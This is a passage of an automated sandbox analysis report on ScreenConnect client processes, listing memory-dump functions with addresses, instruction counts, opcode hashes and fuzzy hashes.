Opcode Fuzzy Hash: 612122ad22c942e13b41af4fdcf5ab925b72c2b6f98aa18655a7f7ee76005a1a
Instruction Fuzzy Hash: 36E04F714492418FC340AF34A549084BFF0FB04610B45855ED8C8C3A02E2349947C741

Function 01CBAFE5 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18363e4f69b61097bdb6d64ae11b9ea624bb2b7776f3d4b87150c431ab196a86
Instruction ID: 9d698e408d20f78bb24c85055952ddf52f221d98c05276c591b05a38e0227b7c
Opcode Fuzzy Hash: 18363e4f69b61097bdb6d64ae11b9ea624bb2b7776f3d4b87150c431ab196a86
Instruction Fuzzy Hash: 95E04F7051D3809FC382DF38AD54149BFF0AE06614F4644AAD8C9C7251E234AC46C762

Function 01CBED28 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa71a069873bec8f37426508f7aa10b8cd947a68d1ee1d8dc7fd3a0e6362f132
Instruction ID: 4d1c34e07e2b52c297e47db3350c5b812a2a4e68e01e5199e1c4beacf4a1e8c8
Opcode Fuzzy Hash: aa71a069873bec8f37426508f7aa10b8cd947a68d1ee1d8dc7fd3a0e6362f132
Instruction Fuzzy Hash: DBE086314047498FC701FF68D459499BFB4EF95304B05868AE4895B113FB30D985D751

Function 01CB5988 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1f1e77ff4dc57b1b2e0de1f14ca354d66bd83273ae0950df82c57095c59649f8
Instruction ID: d076c29e6134e6d26a07e9f96d818615ef88ea150c2dc2a02e409c699393285a
Opcode Fuzzy Hash: 1f1e77ff4dc57b1b2e0de1f14ca354d66bd83273ae0950df82c57095c59649f8
Instruction Fuzzy Hash: E6D01230D01148EFCB44EFA5E90055DB7B9EB49204B1055A9DD09D7350DA31AE049B40

Function 01CBED38 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e81f6d75e0aaf1927fe172bcd548a09ea6ae30a8fc8d163cb5f19438984ab2b5
Instruction ID: 8a34e5ff48f63b8e1acc9d03aa3522a23ef69b95d75adba3da43a8845379c452
Opcode Fuzzy Hash: e81f6d75e0aaf1927fe172bcd548a09ea6ae30a8fc8d163cb5f19438984ab2b5
Instruction Fuzzy Hash: 6FD0C932814B0D8ACB00BFB8D4544A9BBB8EFD5240F00CA5AE88A67121FF70E6D0D691

Function 01CBE660 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.1998609875.0000000001CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 01CB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1cb0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
Instruction ID: e413b76829ce511345703c63ff0569b35dd3d5bbca212faf01176842e92940fb
Opcode Fuzzy Hash: 90914831e188827bec8fb6699bd0399d0e9162b9d4fb3fdc093ca0e1bd9b8edc
Instruction Fuzzy Hash: 3BB011302000008B8288CA08C880808F3A2ABE8308328C0AEA808CB20ACF33E803CA08

Analysis Process: ScreenConnect.WindowsClient.exePID: 7828, Parent PID: 7764COMMON

Executed Functions

Function 00007FFD9BBA5F8A Relevance: 2.1, Strings: 1, Instructions: 862COMMON

Download Yara Rule

Strings

H, xrefs: 00007FFD9BBA644C

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 08422bdf60cd9d10fc44b1f9fd7510da7cad88d847a52d40658335d3f80110c5
Instruction ID: f8efd8af19c5713627fb61ea640cc1861c9bcd1a968a33252eb9d14881a18ae0
Opcode Fuzzy Hash: 08422bdf60cd9d10fc44b1f9fd7510da7cad88d847a52d40658335d3f80110c5
Instruction Fuzzy Hash: 1F52D270F0AA4A4FEBA9EB6884756B977D1FF98304F55047DD04EC32E2DE28B9428741

Function 00007FFD9BBA5731 Relevance: 1.2, Instructions: 1200COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1bd32825f45fdf5b77aa2d6c3291ca61fa5cbe7544b2f9c9d5e7627b1eca868
Instruction ID: f6c536a41fa0e75a8fb7f68af1f9203dd2e9d82db6e4a73bd4cb581c159247b3
Opcode Fuzzy Hash: c1bd32825f45fdf5b77aa2d6c3291ca61fa5cbe7544b2f9c9d5e7627b1eca868
Instruction Fuzzy Hash: 64823B71F1EA4E4FEBB89B6884756B973C2FF98348F560079D44EC31E6DD28AA058341

Function 00007FFD9BBAD12D Relevance: .7, Instructions: 693COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6e8c6b42f371e50987f5eba2c2f732b3ea3feecc0996e3ce6252f4a06569223
Instruction ID: 6955e1c493104011af5db9abd75eb1a67e28b47acb64a0490acce0fa1427fcb5
Opcode Fuzzy Hash: d6e8c6b42f371e50987f5eba2c2f732b3ea3feecc0996e3ce6252f4a06569223
Instruction Fuzzy Hash: DE221671F0EA894FE768EB6C8465AA977E1FF94304F0540BEE04DC72E3DD28A9068741

Function 00007FFD9B8970BD Relevance: .5, Instructions: 507COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df68eb56086a162d352da9d97fb1b3778c68df80220dac790e44727922d383db
Instruction ID: 3d67279340b107f73a442b8d266d484c1c1ebecc89ce02a0b12575e491dfdfef
Opcode Fuzzy Hash: df68eb56086a162d352da9d97fb1b3778c68df80220dac790e44727922d383db
Instruction Fuzzy Hash: 30E16E26F0EA4E0BFB75A7AC98752B93BD1EF89310F15017BD05DC71E3DE19A9428241

Function 00007FFD9BBA5944 Relevance: .4, Instructions: 411COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8bcc74a270ea1f480bfdb0033308b144424be92085ab3f0e778ff0e6d74a3a49
Instruction ID: 752ece1126bd717cfc9cb2db58254625a79238b6dd0f82ae8274dcb4bd2f571e
Opcode Fuzzy Hash: 8bcc74a270ea1f480bfdb0033308b144424be92085ab3f0e778ff0e6d74a3a49
Instruction Fuzzy Hash: 52D1DA70F1AA0F4FEB7997A884746B966D2FF98348F560079C44EC31E6DD28BA068241

Function 00007FFD9BBA5D9C Relevance: .4, Instructions: 386COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08ac9ccbe026b90903a64d71a844e432fdedb081569b3ad24039208e5059b8d5
Instruction ID: f07f26c6ffe0e335c04a09e7f48c9415d78490c0742a7a06ef2b2b3e1b259a81
Opcode Fuzzy Hash: 08ac9ccbe026b90903a64d71a844e432fdedb081569b3ad24039208e5059b8d5
Instruction Fuzzy Hash: F7D1D770F1AE0F4BEB79D7A884756B976D2FF98748F560079C44EC31E6DD28BA028241

Function 00007FFD9BBA64D2 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 152857de8f66d5bc4d568cfa52e17f10dd8a5d7ea1b21cfe08eeb921c37bf3eb
Instruction ID: cb2b778a4edbb50fdca899bc820b629a94a067e15f729039c6fa16c3fc8ba740
Opcode Fuzzy Hash: 152857de8f66d5bc4d568cfa52e17f10dd8a5d7ea1b21cfe08eeb921c37bf3eb
Instruction Fuzzy Hash: FBC1C671F1EE0F4EEB7997A884756B966D2FF99348F560039D04EC31E6DD29BA028240

Function 00007FFD9BBAD9F2 Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f26c33ba9e3fa4057f8125f2c6a059e12d529a09afad4d13b379a60d871aea6f
Instruction ID: 3ccb0c26841337f95445468e5d0b8975614d89d6579c869b178a7c3438f870d2
Opcode Fuzzy Hash: f26c33ba9e3fa4057f8125f2c6a059e12d529a09afad4d13b379a60d871aea6f
Instruction Fuzzy Hash: BBE11730E0A25E4FE769ABA498757E977E0EF45318F0501BFC08ECB1E3DE2856468791

Function 00007FFD9B89F0D5 Relevance: 2.7, Strings: 2, Instructions: 236COMMON

Download Yara Rule

Strings

SM_^, xrefs: 00007FFD9B89F101
UM_I, xrefs: 00007FFD9B89F204

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: SM_^$UM_I
API String ID: 0-2124717712
Opcode ID: ced9c43b931f543818e6636dc338bbc20421ba64c27fef3be90a95964fd56034
Instruction ID: 7dd108cb300d4440cf0de5121c07ca23d084ced57f5a6b38fec723571f250d66
Opcode Fuzzy Hash: ced9c43b931f543818e6636dc338bbc20421ba64c27fef3be90a95964fd56034
Instruction Fuzzy Hash: 84512847B0FAC60BEB1A97ACBCB50F53F90EF9666470942F7D0A88A0E7ED0575068251

Function 00007FFD9B8A86B0 Relevance: 1.8, Strings: 1, Instructions: 505COMMON

Download Yara Rule

Strings

IK_H, xrefs: 00007FFD9B8BDB6E

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: IK_H
API String ID: 0-4273152691
Opcode ID: 1b1d53bcc966f3fc684acb859d391f373e24b25ec5ce542a48ca4cebba227684
Instruction ID: c795c956c875e72e1dfb12a24a1a6e40bc8083c62459fc1323243d6d96227fcc
Opcode Fuzzy Hash: 1b1d53bcc966f3fc684acb859d391f373e24b25ec5ce542a48ca4cebba227684
Instruction Fuzzy Hash: 1DE16A21B1DE9E1FF769AB3C986567577D2EF98340B0501BAD05DC31EBED28AC428381

Function 00007FFD9B890498 Relevance: 1.5, Strings: 1, Instructions: 292COMMON

Download Yara Rule

Strings

?N_^, xrefs: 00007FFD9B890501

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ?N_^
API String ID: 0-1123592777
Opcode ID: 40a5d509ea1561dd6e697cb1d0822cbe8ee5864ccbb5bdf6c0b77cbcecb5ffc1
Instruction ID: 51924e9dc8e4d54bb7f29877f655395e0f9cdf7c2a9471446f18e354a9831ec9
Opcode Fuzzy Hash: 40a5d509ea1561dd6e697cb1d0822cbe8ee5864ccbb5bdf6c0b77cbcecb5ffc1
Instruction Fuzzy Hash: B681FB32B0A62A4BE774A7ACA8756F577D0EF44325B15017BD09E831A2DD18B5478B80

Function 00007FFD9B8CA6F0 Relevance: 1.5, Strings: 1, Instructions: 267COMMON

Download Yara Rule

Strings

}J_H, xrefs: 00007FFD9B8CA864

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: }J_H
API String ID: 0-2151163762
Opcode ID: 1430f7253989555bfbd22e83bc4924fb2ce0dbc0dd98d0ce8a707dd3fed6a4e4
Instruction ID: d0a80891fc21bbd1a53ad7f7b47a94a047565ba5f536e1e7ce51ef9e2bd4a774
Opcode Fuzzy Hash: 1430f7253989555bfbd22e83bc4924fb2ce0dbc0dd98d0ce8a707dd3fed6a4e4
Instruction Fuzzy Hash: D7716671B0EA4E5FD364EB689864571B7E1FF58310B1942BBD09DC72AADA38AD438340

Function 00007FFD9B89B61A Relevance: 1.4, Strings: 1, Instructions: 193COMMON

Download Yara Rule

Strings

S_H, xrefs: 00007FFD9B89B790

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: S_H
API String ID: 0-8460710
Opcode ID: 9011fd0f06ac190ccf2710602ced368213d363d84fb9ae352ce6695161c02cc4
Instruction ID: 2813397ab6b8d66cd3e174fb1a5bb54d926f55bd4cb85b616eeb8e4af213de1b
Opcode Fuzzy Hash: 9011fd0f06ac190ccf2710602ced368213d363d84fb9ae352ce6695161c02cc4
Instruction Fuzzy Hash: BC510372B1EE4D4FEF98EB5C98B56B877D2EF98340B0501B9D44DC32E2ED15A9028341

Function 00007FFD9B89E2A2 Relevance: 1.4, Strings: 1, Instructions: 173COMMON

Download Yara Rule

Strings

AM_L, xrefs: 00007FFD9B89E36D

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: AM_L
API String ID: 0-954708727
Opcode ID: cdcd9bddb24792fd00ad552d828af0d75727fcadb16f4ed715be8e42aa8800ee
Instruction ID: 566eee129b5d98d635aac7905ffd89ba227e96f053896502974c1578e85ec97f
Opcode Fuzzy Hash: cdcd9bddb24792fd00ad552d828af0d75727fcadb16f4ed715be8e42aa8800ee
Instruction Fuzzy Hash: 04417962B1ED8E0BEB6CEB6CE8655B87BC1EF9834176001BED04AC35E6ED10BD074241

Function 00007FFD9B8904FA Relevance: 1.4, Strings: 1, Instructions: 158COMMON

Download Yara Rule

Strings

?N_^, xrefs: 00007FFD9B890501

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: ?N_^
API String ID: 0-1123592777
Opcode ID: 2bcecbce69a5d112ac5d3c13af915870fecc5d69a43d42188ae534a278061593
Instruction ID: e33c72c42175bada8377bb0dec3300ca06d7fad99d6b8d655aba4c9cb9b242dc
Opcode Fuzzy Hash: 2bcecbce69a5d112ac5d3c13af915870fecc5d69a43d42188ae534a278061593
Instruction Fuzzy Hash: 25417E32B0B62E8BE77497EC94746F677D0EF44765F16113BD0DE821A2DE2479428B80

Function 00007FFD9B89E309 Relevance: 1.4, Strings: 1, Instructions: 117COMMON

Download Yara Rule

Strings

AM_L, xrefs: 00007FFD9B89E36D

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID: AM_L
API String ID: 0-954708727
Opcode ID: 4e23a5ae246f194e57e7b1706b87599f11a3ad20ecf518c02d7f96daa9092282
Instruction ID: 8a31c9ed68e9719b88f84f0bd2bec33089c633bf93f1aa772c0f1598cbac561a
Opcode Fuzzy Hash: 4e23a5ae246f194e57e7b1706b87599f11a3ad20ecf518c02d7f96daa9092282
Instruction Fuzzy Hash: 38314862B2AD4E4BEB6CEB2CD4A55B47BD2FFA834175141BDD05AC31E6ED20BD064340

Function 00007FFD9BBAD92E Relevance: 1.3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

Strings

_, xrefs: 00007FFD9BBAD96B

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: d201c6285b62f3674f43c8dabd5cde74a70510d2e559e35b18165de62538cda5
Instruction ID: 7f4881cd0d246f889049bfa08d589d2b0916d5cfd87affaf785c3ecd2e673678
Opcode Fuzzy Hash: d201c6285b62f3674f43c8dabd5cde74a70510d2e559e35b18165de62538cda5
Instruction Fuzzy Hash: 26F02231D0A68C5FEB549F7488A91E9BFF0FF42204F4540E7D848C70E3DE28A6458781

Function 00007FFD9BBAA61C Relevance: .7, Instructions: 668COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c349eb576ddf9b71d6d0bbebb0607f0e1026f0d4561ddf7793ce2532acaacfb0
Instruction ID: 9d85dbf7ba554fa8c2f6d1223d7e95d1dd40c1dc54ab17a9daddd0ca4323fbff
Opcode Fuzzy Hash: c349eb576ddf9b71d6d0bbebb0607f0e1026f0d4561ddf7793ce2532acaacfb0
Instruction Fuzzy Hash: 56121631F0EA4E4FEB6CAA6898656B873E2FF94304F1540BED04DC71E7DD24A9428741

Function 00007FFD9B89CBE0 Relevance: .5, Instructions: 471COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 898591ee9489252de485879b16000cb3c5a6b18e824ca7a30a0e4ef59fa54104
Instruction ID: 76167864e530457e6ac636d4b17ef1e8fb2235e50b351c13790bfb4d4742e15f
Opcode Fuzzy Hash: 898591ee9489252de485879b16000cb3c5a6b18e824ca7a30a0e4ef59fa54104
Instruction Fuzzy Hash: 8AE11431B0DA4D4FDF98DF6CC865AA97BE1EF98300F0501BAD04DC72A6DE25AD428781

Function 00007FFD9B89A3FA Relevance: .4, Instructions: 399COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80ca5981167a9c01994a867e1b1ca711d9a59e39b14cd064045162a0dee38591
Instruction ID: 837d2fd8e1c2b4c2340fe8948ac638fd6c0de0923318c12df833cdf1f4a05af8
Opcode Fuzzy Hash: 80ca5981167a9c01994a867e1b1ca711d9a59e39b14cd064045162a0dee38591
Instruction Fuzzy Hash: 21C12675719A4E9FDF98EF689864AA57BE1FF58354B0001BAD41EC72D6EE30E802C740

Function 00007FFD9BBA4875 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d09ac2a387edf105ff02e666384b527a2b163f15215706e809fa016a7ba434c
Instruction ID: 41cd531ebd3688d1366584c2802690e3a6f2e4e644b44ab8604f1e6c5e0bd0a3
Opcode Fuzzy Hash: 6d09ac2a387edf105ff02e666384b527a2b163f15215706e809fa016a7ba434c
Instruction Fuzzy Hash: 21B14732F0EA4E0FEBA8EA5898A24B473D1FF50344B45057ED45DC71E7ED24BA0A8381

Function 00007FFD9B8ABAA8 Relevance: .4, Instructions: 382COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ddaa4ab9d76a155d2280daa58efae6bc3277d431edd65db4289772e29aedd1f
Instruction ID: 447053f53b1268bebb9632796f7f05b0fba0800ca3e37bbdbc8a45305d3ac92f
Opcode Fuzzy Hash: 6ddaa4ab9d76a155d2280daa58efae6bc3277d431edd65db4289772e29aedd1f
Instruction Fuzzy Hash: 79A14871B1EA4D0FE7A8E76C98695B57BD1EF9D350B0901BBE44DC32A3DD18A8028781

Function 00007FFD9B8914D0 Relevance: .4, Instructions: 372COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1c28bf56e694d9abacf491c07a720cc4020435f91f2958ebdf84c348a72344a
Instruction ID: 429eddb55a60e431b54c4bc332d0070df8366b9d078028162381c64a853a2699
Opcode Fuzzy Hash: c1c28bf56e694d9abacf491c07a720cc4020435f91f2958ebdf84c348a72344a
Instruction Fuzzy Hash: 6FA13932B1D9294BD728B7ACB8585F977C0DF98361B0542BBD04EC72A7DC54AC4287C0

Function 00007FFD9BBABFFC Relevance: .4, Instructions: 356COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d14539d9591d8150e1ea90c285e02800a88fa6a274c38908806addfcc80913d
Instruction ID: 88e8cc118b579a2b152fc99bfb6b9f2bff57d66b6bce654b772d8a067a25ce4c
Opcode Fuzzy Hash: 6d14539d9591d8150e1ea90c285e02800a88fa6a274c38908806addfcc80913d
Instruction Fuzzy Hash: 2FA17872F1DA0D4FE768EA6CD861574B3C1FFA4318B55417AD44EC32E6EE28E9424381

Function 00007FFD9B89A819 Relevance: .3, Instructions: 340COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5fb8ad909b095528ed8f3994016713293ead79d28d263f06c38a0f35fbd7f8
Instruction ID: 53d5997cc702fa72c466a44aaf2e9faf4cb81b6eabef460dd86870d907c10c53
Opcode Fuzzy Hash: 1e5fb8ad909b095528ed8f3994016713293ead79d28d263f06c38a0f35fbd7f8
Instruction Fuzzy Hash: BBB1E275B19A8E8FDF98DF6888756A53BE1FF5D304F0101A9E46DC72E2DA35A902C700

Function 00007FFD9B89F705 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acc2013151d789a8a2bf4b12ec2f7eb6da8debfb272f4764b5302e9c933101cc
Instruction ID: 055998814dccd17b341e87ac9362c0fee174f33d19eb173097b6ce2af57f7695
Opcode Fuzzy Hash: acc2013151d789a8a2bf4b12ec2f7eb6da8debfb272f4764b5302e9c933101cc
Instruction Fuzzy Hash: 71B18171719E4D8FDF98EF68C8A4AA53BA1FF9D304B1501ADD419C72A6DA31E802CB40

Function 00007FFD9B8954F2 Relevance: .3, Instructions: 324COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8354275412cce3a0af77d5c5ecad31d480f7cc2fec365b51dc09ad2ac283b77
Instruction ID: fb417f070a0ef93867cf83756b3aad5d2b8d5575d040ec7d11470172aef46fa2
Opcode Fuzzy Hash: f8354275412cce3a0af77d5c5ecad31d480f7cc2fec365b51dc09ad2ac283b77
Instruction Fuzzy Hash: 63B10871A0D79A8FEB19EB68D8655E97FE0FF49310F0401BEE049C72D3DE2859468741

Function 00007FFD9B890C60 Relevance: .3, Instructions: 301COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1994322767.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9b890000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e061617c0ee8bc4049635dbed179fd7b75cc1373efe9a4b4ba234c22851de88a
Instruction ID: d27282148a4f4dc473d810b8d2376bf77212d79f120b85d06fa09b5f3281e2ab
Opcode Fuzzy Hash: e061617c0ee8bc4049635dbed179fd7b75cc1373efe9a4b4ba234c22851de88a
Instruction Fuzzy Hash: 2D814931B2AE4E4FEBA5EB5C98A4B7577D1FF9C700B0501BAE04DC32A6DD19AC018381

Function 00007FFD9BBA35F5 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.1996406277.00007FFD9BBA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BBA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7ffd9bba0000_ScreenConnect.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1901a858d7097346f201f5a57ec9639fb6ffd2f3833c27b4ab12f93ebdd9702
Instruction ID: 6d114b4d45991484b964f5bed215cbb333830a9136af9e137b8aaa5aadf5e4e5
